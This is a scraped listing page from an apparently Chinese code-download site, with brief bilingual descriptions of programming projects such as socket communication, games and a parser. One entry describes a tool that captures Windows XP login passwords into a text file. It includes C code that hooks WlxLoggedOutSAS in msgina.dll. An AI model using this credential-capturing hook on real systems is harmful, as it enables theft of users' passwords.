-
Winsocket communications VB Winsocket Communications
WinSocket通信 VB实现 WinSocket通信-Winsocket communications VB Winsocket Communications
- 2022-01-22 13:31:06下载
- 积分:1
-
汇编课程设计案例 显示彩色矩形块
汇编课程设计案例 显示彩色矩形块-compilation curriculum design case shows that the color rectangular block
- 2022-03-30 08:47:24下载
- 积分:1
-
the heuristic search!
八数码问题的启发式搜索!-the heuristic search!
- 2022-07-25 08:53:08下载
- 积分:1
-
提取网络流行视频FLV格式转换源码,帮助你理解FLV的数据格式及转换要点...
提取网络流行视频FLV格式转换源码,帮助你理解FLV的数据格式及转换要点-Extraction network popular FLV video format conversion source, to help you understand the FLV format and convert the data points
- 2022-06-14 07:03:55下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
一个设计模式的经典例子,喜欢的人可以随意下载,忘有人能进一步改进...
一个设计模式的经典例子,喜欢的人可以随意下载,忘有人能进一步改进-a design model of the classic examples, like people can download, and forgot it was further improved
- 2023-08-24 12:20:03下载
- 积分:1
-
Introduction to JQuery started JQuery entry JQuery
JQuery入门 JQuery入门-Introduction to JQuery started JQuery entry JQuery
- 2022-06-29 06:55:37下载
- 积分:1
-
语法分析器,用C++运行。非常好用啊!能运行。
语法分析器,用C++运行。非常好用啊!能运行。-Parser
- 2022-06-21 19:32:57下载
- 积分:1
-
Asynchronous serial communication program source code
异步串口通信程序源代码,EVC4.0, Wince.net-Asynchronous serial communication program source code
- 2023-02-09 15:55:04下载
- 积分:1
-
Snake game hopes of learning vc++ The users some help or a graduation project fo...
贪吃蛇游戏希望对学习vc++的网友们有些帮助或是对做毕业设计的人们有些小小的帮助-Snake game hopes of learning vc++ The users some help or a graduation project for people to do some small help
- 2022-03-10 10:39:16下载
- 积分:1